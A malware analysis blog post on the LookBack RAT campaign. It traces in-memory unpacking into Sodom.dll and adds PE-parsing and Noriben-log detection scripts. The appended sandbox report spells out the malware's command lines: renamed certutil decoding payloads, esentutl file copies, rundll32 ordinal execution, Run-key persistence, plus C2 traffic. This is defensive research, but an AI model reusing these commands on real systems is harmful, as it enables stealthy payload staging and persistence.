After the decryption process we return to the main routine of MEM1. Here we push a pointer to the decrypted memory section MEM2 onto the stack along with a pointer to the function list and call the subroutine at 001F0140. This subroutine seems to create a new memory section (MEM3) and copy (parts of) the content of MEM2 into the newly created memory section. I renamed this subroutine CopyMem2ToMem3. Finally, MEM1's main routine deletes the MEM2 memory section with the VirtualFree API call:


MEM1 - Main Routine

If at this point you are confused to what all is going on, don't worry, that is the intent of the malware author. The harder they make it to reverse engineer the code, the longer it will remain a viable threat. Also, as we will see in a minute, the harder they make analysis, the more protection the core functionality or the intent of the malware will have against discovery.

So, this is where we are right now. The exported function curl_share_init created a memory section (MEM1). Next, the main routine of MEM1 created memory section MEM3, which at this time is fully decoded and mapped. MEM1's main routine now continues by calling the subroutine at 001F01C0. This subroutine maps kernel32.dll and ws2_32.dll into MEM3's address space along with certain functions within kernel32.dll and ws2_32.dll:


MEM1 - 001F01C0 Subroutine

I renamed this subroutine to CopyLibraryFunctionsToMem3. Next, after returning from the subroutine, MEM1's main routine directs program execution to MEM3, offset 0x25D0 (MEM3 is mapped at 0x001E0000):


MEM1 - Main Routine

As I did with every newly created memory section, I dumped MEM3 to disk as dec_module-3.bin.


Looking at the dumped binary file with Peview revealed that this memory module is actually a full-fledged PE file, a dll to be precise:


It is showing some interesting export names:


And if we look at the entry point address for the dll (for the DllEntryPoint() function address):


We see the 0x25D0 offset that we witnessed earlier, the offset in MEM3 to which MEM1's main routine diverts program execution.

I don't know whether it's because my extracted memory module wasn't reconstructed properly, or if we truly did discover a new part of the LookBack malware campaign, but when I uploaded the extracted dll to VirusTotal it reported it had not seen the file before and had its AV scanners examine the file:


After the analysis completed, as you can see in the screenshot above, only a few AV engines found anything malicious in the file. That is not too surprising for a module that only ever exists in memory: the raw dump has a hash nobody has submitted before, and its sections still sit at their virtual offsets rather than in the file layout scanners parse.
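An added example, not code from the original post: a small PE header parser that does by hand what pestudio and PEview showed in the UPX section earlier (UPX section names, an empty first section, the entry point inside the packed section) and that also helps with the dumped module discussed here. It carves MZ/PE headers out of a raw dump and rewrites the section table so a module dumped from memory parses like a file. The sample images are headers-only PE32 structures built inside the block; no real binaries are used and the section layouts are made up.

```python
import struct

IMAGE_FILE_DLL = 0x2000
PE32_OPT_SIZE = 0xE0


def build_pe(sections, entry_rva, is_dll=False):
    """Constructed sample: a headers-only PE32 image with the given section table.
    sections: list of (name, virtual_address, virtual_size, size_of_raw_data)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    chars = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, PE32_OPT_SIZE, chars)
    opt = bytearray(PE32_OPT_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                    # AddressOfEntryPoint
    image = bytearray(dos + b"PE\0\0" + coff + opt)
    raw_ptr = 0x400                                                # file-layout pointers
    for name, va, vsize, raw in sections:
        image += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             vsize, va, raw, raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        raw_ptr += raw
    return bytes(image)


def parse_pe(data, off=0):
    """Entry point, DLL flag and section table of the PE image starting at data[off]."""
    if data[off:off + 2] != b"MZ":
        raise ValueError("no MZ header")
    pe = off + struct.unpack_from("<I", data, off + 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]
    size_opt, chars = struct.unpack_from("<HH", data, pe + 20)
    entry_rva = struct.unpack_from("<I", data, pe + 40)[0]       # optional header + 16
    table = pe + 24 + size_opt
    sections = []
    for i in range(nsect):
        hdr = table + 40 * i
        name, vsize, va, raw, ptr = struct.unpack_from("<8sIIII", data, hdr)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw": raw, "ptr": ptr, "hdr": hdr})
    return {"entry_rva": entry_rva, "is_dll": bool(chars & IMAGE_FILE_DLL), "sections": sections}


def entry_section(info):
    for s in info["sections"]:
        if s["va"] <= info["entry_rva"] < s["va"] + max(s["vsize"], s["raw"]):
            return s["name"]
    return None


def upx_indicators(info):
    """The tell-tales pestudio/PEview showed: UPXn section names, an empty first section
    (UPX0 is only the unpack destination) and the entry point inside the packed section."""
    upx_named = [s["name"] for s in info["sections"] if s["name"].upper().startswith("UPX")]
    ep = entry_section(info)
    return {"upx_sections": upx_named,
            "first_section_empty": bool(info["sections"]) and info["sections"][0]["raw"] == 0,
            "entry_section": ep,
            "likely_upx": bool(upx_named) and ep in upx_named}


def find_pe_images(blob):
    """Carve every MZ/PE header pair out of a raw memory dump."""
    hits, i = [], blob.find(b"MZ")
    while i != -1:
        try:
            hits.append((i, parse_pe(blob, i)))
        except (ValueError, struct.error):
            pass                                                   # stray "MZ" bytes
        i = blob.find(b"MZ", i + 1)
    return hits


def unmap_dumped_module(blob, off=0):
    """A module dumped from memory keeps its file-layout section headers while the data
    sits at virtual offsets; point SizeOfRawData/PointerToRawData at the virtual layout
    so file-oriented tools (PEview, a scanner) read the right bytes."""
    out = bytearray(blob[off:])
    for s in parse_pe(out)["sections"]:
        struct.pack_into("<II", out, s["hdr"] + 16, s["vsize"], s["va"])
    return bytes(out)


if __name__ == "__main__":
    packed = build_pe([("UPX0", 0x1000, 0x10000, 0), ("UPX1", 0x11000, 0xC000, 0xC000),
                       (".rsrc", 0x1D000, 0x1000, 0x1000)], 0x1C000)
    print(upx_indicators(parse_pe(packed)))
```

Run the carver over dec_module-3.bin style dumps to locate embedded headers, then unmap_dumped_module on the hit before handing the result to PEview or a scanner; without that step the tools read the section data from the wrong offsets, which is one reason an in-memory module looks unfamiliar to them.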

I will conclude the analysis for now by showing the handover from MEM1 (libcurl-d.dll) to MEM3 (mem3.dll or Sodom.dll).

After commenting the appropriate parts of the MEM1 main routine it now looks like this:


In the screenshot above, we see that MEM1 first initializes the dll with the call at 001F03F8 (DllEntryPoint) and then calls the SodomBodyLoad export function at the highlighted instruction.

The SodomBodyLoad routine will create a thread and then wait for that thread to finish as shown in the screenshot below:


mem3.dll (Sodom.dll) - SodomBodyLoad function

Looking at the MSDN documentation for CreateThread, the API function creates a thread that runs the code pointed to by the third argument (lpStartAddress), which is pushed here as "PUSH 1E1A70", i.e. address 001E1A70. The assembly code that starts at that location is shown in the screenshot below:


mem3.dll (Sodom.dll) - Thread function

At this point a new execution process (new thread) is created. OllyDbg has the newly created thread recorded as 00000B08:


The main task of libcurl.dll is done at this point. The malware continues its activities via mem3.dll (or Sodom.dll, or whatever we want to call it), so our analysis should continue with Sodom.dll. However, I am going to leave that for another blog post, as I feel we have spent enough time staring at assembly code for now. Expect a detailed analysis of Sodom.dll in the near future; that should show us exactly what the malware's intentions are.

Up to now we have only seen the delivery, install and persistence part of the campaign. We know how LookBack is delivered, how it communicates with the C&C and how it begins its life. What we don't know is what it wants, what its ultimate purpose is. From the Proofpoint report we learned that they observed and detected Remote Access Trojan (RAT) functionality. Next time we will look at how that remote access works, what it entails, and how it looks in (assembly) code.

Also, at this point the only affiliation of LookBack with the ICS/OT space is the recipients of the initial phishing email: the people addressed are engineers at OT-related companies. The delivered malware so far shows nothing specifically geared towards an ICS environment. This is, however, how most of these attacks work. Many companies segment their OT network from the IT network, with only a few individuals having access to both. Those individuals tend to be the company's engineers, so targeting them with malware that can provide a pivot point from the internet into the OT network is a strategic move. In these cases the malware is not specifically aimed at the OT environment, but the campaign is.

Detailed analysis of Sodom.dll might show us some functionality that is specifically aimed at stealing ICS data, disrupting ICS processes or even finding particular ICS equipment. It might have more layers of obfuscation that reveal functionality that only surfaces when the real target is in sight. Stay tuned and join me for the next phase of this fascinating journey.
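The delivery, install and persistence chain we have seen so far shows up as a handful of suspicious parent/child process relationships in the Noriben report in the appendix: Word spawning cmd.exe, certutil.exe copied under a new name and run with -decode, esentutl.exe used as a file copier, rundll32.exe calling an export by ordinal, and reg add writing a Run key. The script below is an added example (not part of the original post or of Noriben) that parses lines in Noriben's CreateProcess format and flags those patterns; the sample records are constructed after the appendix entries and the rule names are my own.

```python
"""Flag LookBack's LOLBin and persistence chain in Noriben 'Processes Created' lines."""
import re
from dataclasses import dataclass

# One Noriben "Processes Created" record looks like:
#   [CreateProcess] WINWORD.EXE:3252 > "<command line>" [Child PID: 3232]
PROCESS_RE = re.compile(
    r'^\[CreateProcess\]\s+(?P<parent>\S+?):(?P<ppid>\d+)\s+>\s+'
    r'"(?P<cmdline>.*)"\s+\[Child PID:\s*(?P<pid>\d+)\]\s*$'
)

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Binaries an Office process has little legitimate reason to spawn directly
SHELL_LIKE = {"cmd.exe", "rundll32.exe", "esentutl.exe", "certutil.exe", "powershell.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str      # hypothetical rule name, chosen for this example
    parent: str    # parent image as Noriben reports it
    pid: int       # child PID
    cmdline: str


def _image_name(cmdline: str) -> str:
    """Lower-cased file name of the first token (path and env vars stripped)."""
    first = cmdline.strip().split(" ", 1)[0]
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _unwrap_cmd(cmdline: str) -> str:
    """Drop a leading 'cmd.exe /c' so the wrapped command is what gets classified."""
    m = re.match(r"^\S*cmd\.exe\s+/c\s+(.*)$", cmdline.strip(), re.IGNORECASE)
    return m.group(1) if m else cmdline.strip()


def classify(parent: str, cmdline: str) -> list:
    """Return the names of every rule the process record trips (empty if benign)."""
    rules = []
    outer = _image_name(cmdline)
    inner = _unwrap_cmd(cmdline)
    image = _image_name(inner)
    low = inner.lower()
    if parent.lower() in OFFICE_APPS and outer in SHELL_LIKE:
        rules.append("office-spawns-shell")
    # certutil.exe copied under another name to dodge name-based rules
    if image == "copy" and "certutil.exe" in low:
        rules.append("certutil-copied")
    # '-decode' is a certutil switch; an image not called certutil.exe using it is the renamed copy
    if re.search(r"\s-decode\s", low) and image != "certutil.exe":
        rules.append("renamed-certutil-decode")
    # esentutl /y <src> /d <dst> /o is a file copy through a signed Microsoft binary
    if image == "esentutl.exe" and " /y " in low and " /d " in low:
        rules.append("esentutl-file-copy")
    # rundll32 calling a DLL export by ordinal (libcurl.dll,#52)
    if image == "rundll32.exe" and re.search(r",#\d+", low):
        rules.append("rundll32-ordinal-export")
    # reg add ...\CurrentVersion\Run is per-user autostart persistence
    if re.search(r"\breg(\.exe)?\s+add\b", low) and r"\currentversion\run" in low:
        rules.append("run-key-persistence")
    return rules


def scan_report(text: str) -> list:
    """Parse CreateProcess records out of a Noriben report and classify each one."""
    findings = []
    for line in text.splitlines():
        m = PROCESS_RE.match(line.strip())
        if not m:
            continue  # header, blank line or a record from another section
        for rule in classify(m["parent"], m["cmdline"]):
            findings.append(Finding(rule, m["parent"], int(m["pid"]), m["cmdline"]))
    return findings


# Constructed sample, modelled on the appendix entries of this post
SAMPLE_REPORT = r"""
Processes Created:

[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\splwow64.exe 8192" [Child PID: 944]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c copy %WinDir%\system32\certutil.exe %LocalAppData%\Temptcm.tmp" [Child PID: 3660]
[CreateProcess] cmd.exe:3660 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 2400]
[CreateProcess] cmd.exe:3708 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense1.txt %LocalAppData%\TempGUP.txt" [Child PID: 3444]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\esentutl.exe /y %LocalAppData%\TempGUP.txt /d %Public%\GUP.exe /o" [Child PID: 1920]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 2036]
[CreateProcess] cmd.exe:3420 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlUpdate /f /d rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 2488]
"""

if __name__ == "__main__":
    for f in scan_report(SAMPLE_REPORT):
        print(f"{f.rule:24} pid={f.pid:<5} parent={f.parent:12} {f.cmdline}")
```

The benign splwow64.exe and conhost.exe records produce no findings, while the seven-line sample yields eight hits across all six rules.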

Appendix Section:

Noriben report details:
-=] Sandbox Analysis Report generated by Noriben v1.7.2
-=] Developed by Brian Baskin: brian @@ thebaskins.com @bbaskin
-=] The latest release can be found at https://github.com/Rurik/Noriben
-=] Execution time: 699.63 seconds
-=] Processing time: 0.44 seconds
-=] Analysis time: 31.58 seconds

Processes Created:

[CreateProcess] schtasks.exe:2736 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 1812]
[CreateProcess] services.exe:560 > "%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" [Child PID: 3696]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\splwow64.exe 8192" [Child PID: 944]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c type %LocalAppData%\Temp\pense3.txt>>%LocalAppData%\Temp\pense2.txt" [Child PID: 3232]
[CreateProcess] cmd.exe:3232 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3712]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c copy %WinDir%\system32\certutil.exe %LocalAppData%\Temptcm.tmp" [Child PID: 3660]
[CreateProcess] cmd.exe:3660 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 2400]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c %LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense1.txt %LocalAppData%\TempGUP.txt" [Child PID: 3708]
[CreateProcess] cmd.exe:3708 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 2568]
[CreateProcess] cmd.exe:3708 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense1.txt %LocalAppData%\TempGUP.txt" [Child PID: 3444]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c %LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense2.txt %LocalAppData%\TempGUP2.txt" [Child PID: 1196]
[CreateProcess] cmd.exe:1196 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3528]
[CreateProcess] cmd.exe:1196 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense2.txt %LocalAppData%\TempGUP2.txt" [Child PID: 2072]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c %LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\sodom.txt %LocalAppData%\Tempsodom.txt" [Child PID: 684]
[CreateProcess] cmd.exe:684 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 256]
[CreateProcess] cmd.exe:684 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\sodom.txt %LocalAppData%\Tempsodom.txt" [Child PID: 2984]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\esentutl.exe /y %LocalAppData%\TempGUP.txt /d %Public%\GUP.exe /o" [Child PID: 1920]
[CreateProcess] esentutl.exe:1920 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3780]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\esentutl.exe /y %LocalAppData%\TempGUP2.txt /d %Public%\libcurl.dll /o" [Child PID: 3124]
[CreateProcess] esentutl.exe:3124 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3516]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\esentutl.exe /y %LocalAppData%\Tempsodom.txt /d %Public%\sodom.txt /o" [Child PID: 384]
[CreateProcess] esentutl.exe:384 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3196]
[CreateProcess] WINWORD.EXE:3252 > "%Public%\GUP.exe " [Child PID: 3980]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 2036]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlUpdate /f /d rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 3420]
[CreateProcess] rundll32.exe:2036 > "%WinDir%\System32\rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 3548]
[CreateProcess] cmd.exe:3420 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3224]
[CreateProcess] cmd.exe:3420 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlUpdate /f /d rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 2488]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlInit /f /d %Public%\GUP.exe" [Child PID: 4004]
[CreateProcess] cmd.exe:4004 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 356]
[CreateProcess] cmd.exe:4004 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlInit /f /d %Public%\GUP.exe" [Child PID: 3976]

Registry Activity:

[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 1
[RegSetValue] WINWORD.EXE:3252 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegSetValue] OSPPSVC.EXE:3696 > HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\ServiceSessionId = 97 7C E4 F2 21 AE 95 4E 91 72 A3 8D C8 AF C7 50
[RegSetValue] OSPPSVC.EXE:3696 > HKU\S-1-5-20\Software\Microsoft\OfficeSoftwareProtectionPlatform\VLRenewalSchedule = 81 6A CB 9F 01 00 00 00 00 00 00 00 04 00 00 00
[RegSetValue] reg.exe:2488 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CurlUpdate = rundll32.exe C:\Users\Public\libcurl.dll,#52
[RegDeleteValue] taskhostex.exe:2352 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe
[RegSetValue] reg.exe:3976 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CurlInit = C:\Users\Public\GUP.exe
[RegDeleteValue] taskhostex.exe:2352 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe
[RegSetValue] OSPPSVC.EXE:3696 > HKU\S-1-5-20\Software\Microsoft\OfficeSoftwareProtectionPlatform\VLRenewalSchedule = 81 6A CB 9F 01 00 00 00 00 00 00 00 04 00 00 00

Network Traffic:

[TCP] 127.0.0.1:1095 > GUP.exe:3980
[TCP] rundll32.exe:3548 > 127.0.0.1:9090
[TCP] GUP.exe:3980 > 103.253.41.45:80
[TCP] 103.253.41.45:80 > GUP.exe:3980
[TCP] 127.0.0.1:9090 > rundll32.exe:3548
[TCP] GUP.exe:3980 > 127.0.0.1:1095

Unique Hosts:

103.253.41.45
127.0.0.1

About the Author

Pascal Ackerman is a seasoned industrial security professional with a degree in electrical engineering and 18 years of experience in industrial network design and support, information and network security, risk assessments, pentesting, threat hunting and forensics. After almost two decades of hands-on, in-the-field and consulting experience, he joined ThreatGEN in 2019 and is currently employed as Principal Analyst in Industrial Threat Intelligence & Forensics. His passion lies in analyzing new and existing threats to ICS environments, and he fights cyber adversaries both from his home base and while traveling the world with his family as a digital nomad.